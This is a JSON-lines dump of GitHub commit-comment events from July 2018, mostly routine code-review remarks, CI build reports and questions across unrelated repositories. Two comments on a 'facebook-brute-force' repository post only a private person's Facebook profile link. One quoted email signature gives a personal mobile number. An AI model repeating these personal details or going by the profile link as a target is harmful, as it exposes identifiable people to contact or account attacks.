{"id":"7932477451","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"JerryTsang/android_kernel_sharp_msm8974"},"payload":{"comment":{"id":29629937,"position":null,"line":null,"path":null,"commit_id":"c2ba89c6b256cc21ae077888e3248121a5789cb3","created_at":"2018-07-07T15:03:23Z","updated_at":"2018-07-07T15:03:23Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/14954514/42412185-edb71964-8239-11e8-97d2-b591f09c79df.png)\r\n"}},"created_at":"2018-07-07T15:03:23Z"}
{"id":"7932478886","type":"CommitCommentEvent","actor":{"login":"mapcat"},"repo":{"name":"TravelMapping/HighwayData"},"payload":{"comment":{"id":29629940,"position":null,"line":null,"path":null,"commit_id":"efa7183b4cca971d531dc98030b79843f53c19ad","created_at":"2018-07-07T15:04:26Z","updated_at":"2018-07-07T15:04:26Z","author_association":"CONTRIBUTOR","body":"Thanks!\n\nOn Sat, Jul 7, 2018 at 11:01 AM Jim Teresco <notifications@github.com>\nwrote:\n\n> Rename usala1 to usala as @mapcat will draft them all in one chunk.\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n>\n> https://github.com/TravelMapping/HighwayData/commit/efa7183b4cca971d531dc98030b79843f53c19ad\n>\n"}},"created_at":"2018-07-07T15:04:26Z"}
{"id":"7932479545","type":"CommitCommentEvent","actor":{"login":"myGitToy"},"repo":{"name":"myGitToy/ags"},"payload":{"comment":{"id":29629943,"position":76,"line":202,"path":"ags_snapshot.py","commit_id":"651d3d5f0a3907e863282275bc043703ab81b2a1","created_at":"2018-07-07T15:04:55Z","updated_at":"2018-07-07T15:04:55Z","author_association":"OWNER","body":"将参数前置，一次只需要修改一个地方，方便后续月份统计用"}},"created_at":"2018-07-07T15:04:55Z"}
{"id":"7932480807","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29629950,"position":null,"line":null,"path":null,"commit_id":"5531f44077d94ecb03b945c15d169b04f38ff171","created_at":"2018-07-07T15:05:50Z","updated_at":"2018-07-07T15:05:50Z","author_association":"OWNER","body":"Oh yes. . I certainly don't want that.  Thx.\n\nOn Sat, Jul 7, 2018 at 9:02 AM, Stefan Geschwentner <\nnotifications@github.com> wrote:\n\n> @protonspring <https://github.com/protonspring>\n> Line 619 in evaluate.cpp makes no sense because of the ^ operator:\n> score -= UnsupportedPawn * popcount(pe->weakPawns[Us] ^\n> attackedBy[Us][ALL_PIECES]);\n> The ^ operator is a bitwise exclusive OR. This means if a bit is set in\n> the second operand then the bit at the corresponding position in the first\n> operand is flipped. So all squares without a weak pawn but attacked by Us\n> are counted too.\n>\n> Following is correct:\n> score -= UnsupportedPawn * popcount(pe->weakPawns[Us] &\n> ~attackedBy[Us][ALL_PIECES]);\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/5531f44077d94ecb03b945c15d169b04f38ff171#commitcomment-29629932>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSFNhuVLnU1YGm_AytwH0wYA0o4mDks5uEM1wgaJpZM4VGY1Z>\n> .\n>\n\n\n\n-- \nMichael T. Whiteley\nmobile: 801.707.6886\n"}},"created_at":"2018-07-07T15:05:50Z"}
{"id":"7932481149","type":"CommitCommentEvent","actor":{"login":"mapcat"},"repo":{"name":"TravelMapping/HighwayData"},"payload":{"comment":{"id":29629954,"position":null,"line":null,"path":null,"commit_id":"efa7183b4cca971d531dc98030b79843f53c19ad","created_at":"2018-07-07T15:06:05Z","updated_at":"2018-07-07T15:06:05Z","author_association":"CONTRIBUTOR","body":"Well now I can't merge. My usala1 directory is different from the master\nusala directory...guess that's the problem?\n\nOn Sat, Jul 7, 2018 at 11:04 AM Map Cat <mapcat@gmail.com> wrote:\n\n> Thanks!\n>\n> On Sat, Jul 7, 2018 at 11:01 AM Jim Teresco <notifications@github.com>\n> wrote:\n>\n>> Rename usala1 to usala as @mapcat will draft them all in one chunk.\n>>\n>> --\n>> You are receiving this because you were mentioned.\n>> Reply to this email directly or view it on GitHub:\n>>\n>> https://github.com/TravelMapping/HighwayData/commit/efa7183b4cca971d531dc98030b79843f53c19ad\n>>\n>\n"}},"created_at":"2018-07-07T15:06:05Z"}
{"id":"7932485427","type":"CommitCommentEvent","actor":{"login":"kduske"},"repo":{"name":"kduske/TrenchBroom"},"payload":{"comment":{"id":29629958,"position":null,"line":null,"path":null,"commit_id":"d87df3dcdfb5929c6aef86a2288002615c5278e7","created_at":"2018-07-07T15:09:13Z","updated_at":"2018-07-07T15:09:13Z","author_association":"OWNER","body":"Addressed both. SOF triggered a bug when reading descriptions that resulted in an infinite loop. "}},"created_at":"2018-07-07T15:09:13Z"}
{"id":"7932485974","type":"CommitCommentEvent","actor":{"login":"ejabu"},"repo":{"name":"flexdinesh/react-redux-boilerplate"},"payload":{"comment":{"id":29629959,"position":41,"line":39,"path":"app/containers/HomePage/index.js","commit_id":"04829f8dd5deffb695aef966585a39f7ed68692e","created_at":"2018-07-07T15:09:40Z","updated_at":"2018-07-07T15:09:40Z","author_association":"NONE","body":"What is the use of Line 39 ?\r\n\r\n`export { mapDispatchToProps };`\r\n\r\nI am learning react, and when I connect header with Redux Store, it is okay without including the last line.\r\n\r\n`// export { default } from './Header';\r\n\r\nimport Header from './Header';\r\n\r\nimport { connect } from 'react-redux';\r\nimport { compose } from 'redux';\r\nimport { createStructuredSelector } from 'reselect';\r\nimport {\r\n  makeSelectSidebar\r\n} from 'containers/App/selectors';\r\nimport { toggleDrawer } from './actions';\r\n\r\nconst mapDispatchToProps = (dispatch) => ({\r\n  onClose: (evt) => {\r\n    if (evt !== undefined && evt.preventDefault) evt.preventDefault();\r\n    dispatch(toggleDrawer());\r\n  }\r\n});\r\n\r\nconst mapStateToProps = createStructuredSelector({\r\n  sidebar: makeSelectSidebar(),\r\n});\r\n\r\nconst withConnect = connect(mapStateToProps, mapDispatchToProps);\r\n\r\n\r\nexport default compose(withConnect)(Header);\r\n// Is it okay to exclude This Line  ??\r\n// export { mapDispatchToProps };\r\n`\r\n\r\n@flexdinesh "}},"created_at":"2018-07-07T15:09:40Z"}
{"id":"7932487441","type":"CommitCommentEvent","actor":{"login":"jteresco"},"repo":{"name":"TravelMapping/HighwayData"},"payload":{"comment":{"id":29629960,"position":null,"line":null,"path":null,"commit_id":"efa7183b4cca971d531dc98030b79843f53c19ad","created_at":"2018-07-07T15:10:44Z","updated_at":"2018-07-07T15:10:44Z","author_association":"CONTRIBUTOR","body":"Yes, it would want all of your changes also to move over to usala, probably."}},"created_at":"2018-07-07T15:10:44Z"}
{"id":"7932489335","type":"CommitCommentEvent","actor":{"login":"mapcat"},"repo":{"name":"TravelMapping/HighwayData"},"payload":{"comment":{"id":29629966,"position":null,"line":null,"path":null,"commit_id":"efa7183b4cca971d531dc98030b79843f53c19ad","created_at":"2018-07-07T15:12:12Z","updated_at":"2018-07-07T15:12:12Z","author_association":"CONTRIBUTOR","body":"So how do I handle this"}},"created_at":"2018-07-07T15:12:12Z"}
{"id":"7932491648","type":"CommitCommentEvent","actor":{"login":"vitanombre"},"repo":{"name":"lyon-esport/AdminAFK"},"payload":{"comment":{"id":29629973,"position":null,"line":null,"path":null,"commit_id":"5047e8b7d622c728ed2c762f50448ca883a63d20","created_at":"2018-07-07T15:13:59Z","updated_at":"2018-07-07T15:13:59Z","author_association":"MEMBER","body":"-Fail commit --> Update V1.52 and not V1.53"}},"created_at":"2018-07-07T15:13:59Z"}
{"id":"7932493124","type":"CommitCommentEvent","actor":{"login":"NomiasSR"},"repo":{"name":"leonardovilarinho/livro-vue"},"payload":{"comment":{"id":29629975,"position":null,"line":null,"path":null,"commit_id":"3243beebb4c94b2ee10baa5bcda2e82b3dd3f16e","created_at":"2018-07-07T15:15:06Z","updated_at":"2018-07-07T15:15:06Z","author_association":"NONE","body":"Olá Leonardo, recentemente adquiri seu livro e estou tendo um problema no exemplo do carros.js. Fiz tudo de acordo com o livro mas estou tento sempre o erro 404 quando tento executar http://localhost:8080/dados/carros.json\r\n\r\n\r\nVocê poderia me dar uma ajuda com relação a esse erro, por gentileza?\r\n\r\nObrigado"}},"created_at":"2018-07-07T15:15:06Z"}
{"id":"7932493667","type":"CommitCommentEvent","actor":{"login":"istina2018"},"repo":{"name":"getinsomnia/insomnia"},"payload":{"comment":{"id":29629978,"position":5,"line":215,"path":"packages/insomnia-app/app/common/hotkeys.js","commit_id":"4f50cd5ff9521ee19dbddd91397d6279a2c44bb7","created_at":"2018-07-07T15:15:26Z","updated_at":"2018-07-07T15:15:26Z","author_association":"NONE","body":"Yes777"}},"created_at":"2018-07-07T15:15:26Z"}
{"id":"7932496768","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29629982,"position":null,"line":null,"path":null,"commit_id":"ea02aa2bd31654f00ef055f77c69fe89623aee44","created_at":"2018-07-07T15:17:53Z","updated_at":"2018-07-07T15:17:53Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Build Failed\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 628\n\nregression Test Summary\n * Passed: 642\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea02aa2bd31654f00ef055f77c69fe89623aee44-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea02aa2bd31654f00ef055f77c69fe89623aee44-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.26%25-red.png)</a> \n"}},"created_at":"2018-07-07T15:17:53Z"}
{"id":"7932496933","type":"CommitCommentEvent","actor":{"login":"NomiasSR"},"repo":{"name":"leonardovilarinho/livro-vue"},"payload":{"comment":{"id":29629983,"position":null,"line":null,"path":null,"commit_id":"98615c52292fd81370d73e0f1363eaccd182bb9f","created_at":"2018-07-07T15:18:00Z","updated_at":"2018-07-07T15:18:00Z","author_association":"NONE","body":"Olá Leonardo, recentemente adquiri seu livro e estou tendo um problema no exemplo do carros.js. Fiz tudo de acordo com o livro mas estou tento sempre o erro 404 quando tento executar http://localhost:8080/dados/carros.json\r\n\r\nVocê poderia me dar uma ajuda com relação a esse erro, por gentileza?\r\n\r\nObrigado"}},"created_at":"2018-07-07T15:18:00Z"}
{"id":"7932497974","type":"CommitCommentEvent","actor":{"login":"jmillz88"},"repo":{"name":"themastersunil/facebook-brute-force"},"payload":{"comment":{"id":29629985,"position":30,"line":30,"path":"facebook.pl","commit_id":"55fd78f4fdd489e0ca9d1d74504b366784ef5cd6","created_at":"2018-07-07T15:18:51Z","updated_at":"2018-07-07T15:18:51Z","author_association":"NONE","body":"https://www.facebook.com/lacey.lowenberg.90"}},"created_at":"2018-07-07T15:18:51Z"}
{"id":"7932501344","type":"CommitCommentEvent","actor":{"login":"jteresco"},"repo":{"name":"TravelMapping/HighwayData"},"payload":{"comment":{"id":29629989,"position":null,"line":null,"path":null,"commit_id":"efa7183b4cca971d531dc98030b79843f53c19ad","created_at":"2018-07-07T15:21:26Z","updated_at":"2018-07-07T15:21:26Z","author_association":"CONTRIBUTOR","body":"Will reply to your email.\r\n"}},"created_at":"2018-07-07T15:21:26Z"}
{"id":"7932502046","type":"CommitCommentEvent","actor":{"login":"KinRovtaz"},"repo":{"name":"Novl/victorina"},"payload":{"comment":{"id":29629990,"position":null,"line":null,"path":null,"commit_id":"818576826cb6f70a04ce73865200dd04ba3a224e","created_at":"2018-07-07T15:21:57Z","updated_at":"2018-07-07T15:21:57Z","author_association":"NONE","body":"короче если number_of_questions = 5  # len(answers) - 1  то сразу     if answer in answers[number_of_questions][0].split(', '):\r\nIndexError: list index out of range\r\n\r\n\r\n\r\nа если number_of_questions = 6   # len(answers) - 1 то после 2 или 3 вопроса зависание без выхода"}},"created_at":"2018-07-07T15:21:57Z"}
{"id":"7932503250","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29629996,"position":null,"line":null,"path":null,"commit_id":"ea02aa2bd31654f00ef055f77c69fe89623aee44","created_at":"2018-07-07T15:22:53Z","updated_at":"2018-07-07T15:22:53Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea02aa2bd31654f00ef055f77c69fe89623aee44-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-07T15:22:53Z"}
{"id":"7932510994","type":"CommitCommentEvent","actor":{"login":"SkyFly97"},"repo":{"name":"CunningFox146/RLP"},"payload":{"comment":{"id":29630005,"position":null,"line":null,"path":null,"commit_id":"99789029582482cd141d4836d39645383f03a5c9","created_at":"2018-07-07T15:28:38Z","updated_at":"2018-07-07T15:28:38Z","author_association":"NONE","body":"hello"}},"created_at":"2018-07-07T15:28:38Z"}
{"id":"7932511686","type":"CommitCommentEvent","actor":{"login":"kounoAkihiro"},"repo":{"name":"kounoAkihiro/mao-seminar"},"payload":{"comment":{"id":29630007,"position":7,"line":3,"path":"README.md","commit_id":"6a7a2c9bb0d374138d7b702f439058b8f29e7da9","created_at":"2018-07-07T15:29:14Z","updated_at":"2018-07-07T15:29:14Z","author_association":"OWNER","body":"ぱぱ"}},"created_at":"2018-07-07T15:29:14Z"}
{"id":"7932514470","type":"CommitCommentEvent","actor":{"login":"jmillz88"},"repo":{"name":"themastersunil/facebook-brute-force"},"payload":{"comment":{"id":29630014,"position":null,"line":null,"path":null,"commit_id":"55fd78f4fdd489e0ca9d1d74504b366784ef5cd6","created_at":"2018-07-07T15:31:16Z","updated_at":"2018-07-07T15:31:16Z","author_association":"NONE","body":"https://www.facebook.com/lacey.lowenberg.90"}},"created_at":"2018-07-07T15:31:16Z"}
{"id":"7932515201","type":"CommitCommentEvent","actor":{"login":"fr3fou"},"repo":{"name":"avirupdutta/500k-Subscriber-Map"},"payload":{"comment":{"id":29630015,"position":null,"line":null,"path":null,"commit_id":"d973e6be7257f8e1cdea8f666096889524bbe569","created_at":"2018-07-07T15:31:49Z","updated_at":"2018-07-07T15:31:49Z","author_association":"NONE","body":"Why not make into a seperate .css file and reference that in the index.html? Makes it much cleaner."}},"created_at":"2018-07-07T15:31:49Z"}
{"id":"7932515626","type":"CommitCommentEvent","actor":{"login":"MikkCZ"},"repo":{"name":"MozillaCZ/start-mozilla-cz"},"payload":{"comment":{"id":29630017,"position":null,"line":null,"path":null,"commit_id":"a2dc3f045af2a03aef3e32155dd3b76eea33736e","created_at":"2018-07-07T15:32:08Z","updated_at":"2018-07-07T15:32:08Z","author_association":"MEMBER","body":"fix #44 "}},"created_at":"2018-07-07T15:32:08Z"}
{"id":"7932517433","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29630023,"position":null,"line":null,"path":null,"commit_id":"ea02aa2bd31654f00ef055f77c69fe89623aee44","created_at":"2018-07-07T15:33:34Z","updated_at":"2018-07-07T15:33:34Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Build Failed\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 628\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea02aa2bd31654f00ef055f77c69fe89623aee44-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea02aa2bd31654f00ef055f77c69fe89623aee44-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-33.02%25-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea02aa2bd31654f00ef055f77c69fe89623aee44-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.png)</a>\n"}},"created_at":"2018-07-07T15:33:34Z"}
{"id":"7932518156","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29630025,"position":null,"line":null,"path":null,"commit_id":"dc5e19a0e2df45fab245418be91d01dd8e84d9a0","created_at":"2018-07-07T15:34:09Z","updated_at":"2018-07-07T15:34:09Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement basic Gameplay](https://trello.com/c/ZAY0XQJa/2-implement-basic-gameplay)"}},"created_at":"2018-07-07T15:34:09Z"}
{"id":"7932519055","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29630028,"position":null,"line":null,"path":null,"commit_id":"ea02aa2bd31654f00ef055f77c69fe89623aee44","created_at":"2018-07-07T15:34:57Z","updated_at":"2018-07-07T15:34:57Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea02aa2bd31654f00ef055f77c69fe89623aee44-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-07T15:34:57Z"}
{"id":"7932520492","type":"CommitCommentEvent","actor":{"login":"jteresco"},"repo":{"name":"TravelMapping/HighwayData"},"payload":{"comment":{"id":29630030,"position":null,"line":null,"path":null,"commit_id":"c65b38faee51c128711196cce08e9d5bbdd2f6d9","created_at":"2018-07-07T15:36:07Z","updated_at":"2018-07-07T15:36:07Z","author_association":"CONTRIBUTOR","body":"Curious about why those entries were made to the .gitignore file."}},"created_at":"2018-07-07T15:36:07Z"}
{"id":"7932521309","type":"CommitCommentEvent","actor":{"login":"sabran125"},"repo":{"name":"kallewoof/btcdeb"},"payload":{"comment":{"id":29630034,"position":null,"line":null,"path":null,"commit_id":"1d6c065bf47631d9f8f2b9b6061d2c494884c5a5","created_at":"2018-07-07T15:36:42Z","updated_at":"2018-07-07T15:36:42Z","author_association":"NONE","body":"1d6c065"}},"created_at":"2018-07-07T15:36:42Z"}
{"id":"7932521444","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29630035,"position":null,"line":null,"path":null,"commit_id":"b1f0e2dda43dec347a54fc1ebf3a872c8d0be054","created_at":"2018-07-07T15:36:48Z","updated_at":"2018-07-07T15:36:48Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180707-153641 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180707-153641\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-07T15:36:48Z"}
{"id":"7932521464","type":"CommitCommentEvent","actor":{"login":"rapicastillo"},"repo":{"name":"rapicastillo/swift-chat-app"},"payload":{"comment":{"id":29630036,"position":12,"line":22,"path":"ChatApp/Controller/ChannelVC.swift","commit_id":"9cad2c0b13a61eac2e210f4739cefc289c2478ec","created_at":"2018-07-07T15:36:49Z","updated_at":"2018-07-07T15:36:49Z","author_association":"OWNER","body":"Necessary to observe notifications from a notifier witht he name NOTIF_USER_DATA_DID_CHANGE"}},"created_at":"2018-07-07T15:36:49Z"}
{"id":"7932522089","type":"CommitCommentEvent","actor":{"login":"sabran125"},"repo":{"name":"kallewoof/btcdeb"},"payload":{"comment":{"id":29630037,"position":null,"line":null,"path":null,"commit_id":"4578842fe0e16032b118b85570d684cda1e80b4f","created_at":"2018-07-07T15:37:16Z","updated_at":"2018-07-07T15:37:16Z","author_association":"NONE","body":"4578842"}},"created_at":"2018-07-07T15:37:16Z"}
{"id":"7932523601","type":"CommitCommentEvent","actor":{"login":"denio-rus"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29630039,"position":null,"line":null,"path":null,"commit_id":"747cdcad6b575376eb75c85263b4174e2bc5bac7","created_at":"2018-07-07T15:38:27Z","updated_at":"2018-07-07T15:38:27Z","author_association":"OWNER","body":"А у меня нет этой переменной. Я избавился от нее после темы с переменными класса. До этого были замечания от вас (думаю от Максима), что Интерфейс не должен участвовать в логике  на уровне хранения списка объектов, то есть его задачи - это запрос информации, передача ее классам - по сути организация взаимодействия с пользователем. Так же Максим мне объяснял, что даже то, что Интрефейс какую-то логику взаимодействия объектов содержит - это уже лишнее, должен быть отдельный элемент для этой логики. Исходя из этих предпосылок, я как мог избавлялся от переменных и прочего. Выходит, что у меня все пользователи работают  на одном уровне - непосредственно с тем большим списком в классе."}},"created_at":"2018-07-07T15:38:27Z"}
{"id":"7932524022","type":"CommitCommentEvent","actor":{"login":"Marginal"},"repo":{"name":"Marginal/EDMarketConnector"},"payload":{"comment":{"id":29630040,"position":null,"line":null,"path":null,"commit_id":"a7fb3017236116f047b65540da53983162b865f7","created_at":"2018-07-07T15:38:48Z","updated_at":"2018-07-07T15:38:48Z","author_association":"OWNER","body":"Done.\r\nThanks again @zhixianwu and welcome to GitHub."}},"created_at":"2018-07-07T15:38:48Z"}
{"id":"7932525178","type":"CommitCommentEvent","actor":{"login":"rapicastillo"},"repo":{"name":"rapicastillo/swift-chat-app"},"payload":{"comment":{"id":29630042,"position":50,"line":61,"path":"ChatApp/Controller/RegisterVC.swift","commit_id":"9cad2c0b13a61eac2e210f4739cefc289c2478ec","created_at":"2018-07-07T15:39:30Z","updated_at":"2018-07-07T15:39:30Z","author_association":"OWNER","body":"This builds a spinner to show that the app is \"doing something\""}},"created_at":"2018-07-07T15:39:30Z"}
{"id":"7932525535","type":"CommitCommentEvent","actor":{"login":"rapicastillo"},"repo":{"name":"rapicastillo/swift-chat-app"},"payload":{"comment":{"id":29630043,"position":52,"line":63,"path":"ChatApp/Controller/RegisterVC.swift","commit_id":"9cad2c0b13a61eac2e210f4739cefc289c2478ec","created_at":"2018-07-07T15:39:45Z","updated_at":"2018-07-07T15:39:45Z","author_association":"OWNER","body":"This builds a spinner to show that the app is \"doing something\"\r\n\r\n"}},"created_at":"2018-07-07T15:39:45Z"}
{"id":"7932526111","type":"CommitCommentEvent","actor":{"login":"rapicastillo"},"repo":{"name":"rapicastillo/swift-chat-app"},"payload":{"comment":{"id":29630044,"position":5,"line":18,"path":"ChatApp/Controller/RegisterVC.swift","commit_id":"9cad2c0b13a61eac2e210f4739cefc289c2478ec","created_at":"2018-07-07T15:40:12Z","updated_at":"2018-07-07T15:40:12Z","author_association":"OWNER","body":"This represents a `UIActivityIndicatorView` element."}},"created_at":"2018-07-07T15:40:12Z"}
{"id":"7932527900","type":"CommitCommentEvent","actor":{"login":"SubhrajyotiSen"},"repo":{"name":"Harpia-development/device_motorola_harpia"},"payload":{"comment":{"id":29630046,"position":14,"line":86,"path":"rootdir/etc/init.target.rc","commit_id":"ab9d51f3e4a26fab4c4a258472e46b76b9d41064","created_at":"2018-07-07T15:41:34Z","updated_at":"2018-07-07T15:41:34Z","author_association":"CONTRIBUTOR","body":"harpia-config-sh"}},"created_at":"2018-07-07T15:41:34Z"}
{"id":"7932528925","type":"CommitCommentEvent","actor":{"login":"Plabon21"},"repo":{"name":"MarcoFarrier/FacebookHackerCup2018"},"payload":{"comment":{"id":29630048,"position":null,"line":null,"path":null,"commit_id":"1b1a7cf334e6c0b0c5881b47a800a2b214f11617","created_at":"2018-07-07T15:42:22Z","updated_at":"2018-07-07T15:42:22Z","author_association":"NONE","body":"may i get this code in c or cpp language?"}},"created_at":"2018-07-07T15:42:22Z"}
{"id":"7932529839","type":"CommitCommentEvent","actor":{"login":"SubhrajyotiSen"},"repo":{"name":"Harpia-development/device_motorola_harpia"},"payload":{"comment":{"id":29630049,"position":6,"line":6,"path":"rootdir/Android.mk","commit_id":"ab9d51f3e4a26fab4c4a258472e46b76b9d41064","created_at":"2018-07-07T15:43:05Z","updated_at":"2018-07-07T15:43:05Z","author_association":"CONTRIBUTOR","body":"init.harpia.config.sh"}},"created_at":"2018-07-07T15:43:05Z"}
{"id":"7932530545","type":"CommitCommentEvent","actor":{"login":"xianfengting"},"repo":{"name":"xianfengting/ClassThreeApplication"},"payload":{"comment":{"id":29630051,"position":52,"line":52,"path":"app/src/main/java/com/src_resources/classThreeApplication/AppVersionCheckingService.kt","commit_id":"c83f2a89f70aea6da5a8630e687af7dedd2a3986","created_at":"2018-07-07T15:43:38Z","updated_at":"2018-07-07T15:43:38Z","author_association":"OWNER","body":"此行代码参考自 https://my.oschina.net/u/133352/blog/96582 。"}},"created_at":"2018-07-07T15:43:38Z"}
{"id":"7932530584","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29630052,"position":null,"line":null,"path":null,"commit_id":"bb89b3892c0521a69e6a1b8c832c97ec1a4137e9","created_at":"2018-07-07T15:43:41Z","updated_at":"2018-07-07T15:43:41Z","author_association":"NONE","body":"@candirufish \r\nPlease rebase to current master an test against it. You have left out several patches which interact with your tuning so this test can't be useful."}},"created_at":"2018-07-07T15:43:41Z"}
{"id":"7932531570","type":"CommitCommentEvent","actor":{"login":"cjrisua"},"repo":{"name":"cjrisua/cellarbroker"},"payload":{"comment":{"id":29630053,"position":null,"line":null,"path":null,"commit_id":"7a64ae8651d9e4cd30706e9a95c42a6a8cfc42de","created_at":"2018-07-07T15:44:26Z","updated_at":"2018-07-07T15:44:26Z","author_association":"OWNER","body":"y"}},"created_at":"2018-07-07T15:44:26Z"}
{"id":"7932532257","type":"CommitCommentEvent","actor":{"login":"MarcoFarrier"},"repo":{"name":"MarcoFarrier/FacebookHackerCup2018"},"payload":{"comment":{"id":29630055,"position":null,"line":null,"path":null,"commit_id":"1b1a7cf334e6c0b0c5881b47a800a2b214f11617","created_at":"2018-07-07T15:45:03Z","updated_at":"2018-07-07T15:45:03Z","author_association":"OWNER","body":"I’m coding in Java, might code in C++ later for practice, in any case, I won’t publicly commit until the Hacker Cup is over.\r\n\r\nFrom: Plabon21 <notifications@github.com>\r\nSent: Saturday, July 7, 2018 9:42 AM\r\nTo: MarcoFarrier/FacebookHackerCup2018 <FacebookHackerCup2018@noreply.github.com>\r\nCc: MarcoFarrier <marcofarrier@outlook.com>; Author <author@noreply.github.com>\r\nSubject: Re: [MarcoFarrier/FacebookHackerCup2018] Initial Setup (1b1a7cf)\r\n\r\n\r\nmay i get this code in c or cpp language?\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://nam03.safelinks.protection.outlook.com/?url=https%3A%2F%2Fgithub.com%2FMarcoFarrier%2FFacebookHackerCup2018%2Fcommit%2F1b1a7cf334e6c0b0c5881b47a800a2b214f11617%23commitcomment-29630048&data=02%7C01%7C%7Ce896ef25d3904b97283108d5e4203bb9%7C84df9e7fe9f640afb435aaaaaaaaaaaa%7C1%7C0%7C636665749438609190&sdata=KaYueEMx%2FwhidIcbMQpTRXTOxHgWgLXHzLqgJetlHwY%3D&reserved=0>, or mute the thread<https://nam03.safelinks.protection.outlook.com/?url=https%3A%2F%2Fgithub.com%2Fnotifications%2Funsubscribe-auth%2FAGu-R7EzW5xbNXi8YSvNdjiFsspPOyUuks5uENbfgaJpZM4VGZne&data=02%7C01%7C%7Ce896ef25d3904b97283108d5e4203bb9%7C84df9e7fe9f640afb435aaaaaaaaaaaa%7C1%7C0%7C636665749438609190&sdata=yP5%2Fnc%2BaJyM%2FEgslldXykzcSkFRkjacv4HFAdgZ9iKM%3D&reserved=0>.\r\n"}},"created_at":"2018-07-07T15:45:03Z"}
{"id":"7932533213","type":"CommitCommentEvent","actor":{"login":"SubhrajyotiSen"},"repo":{"name":"Alberto97/android_device_motorola_osprey"},"payload":{"comment":{"id":29630059,"position":112,"line":112,"path":"rootdir/etc/init.osprey.config.sh","commit_id":"c7dbfe6ccef04fe9139b4f45de30901a0167a7fd","created_at":"2018-07-07T15:45:46Z","updated_at":"2018-07-07T15:45:46Z","author_association":"NONE","body":"I know it won't make any difference but since heapstartsize, heaptargetutilization and heapmaxfree are common, can't they just be set outside the switch block?"}},"created_at":"2018-07-07T15:45:46Z"}
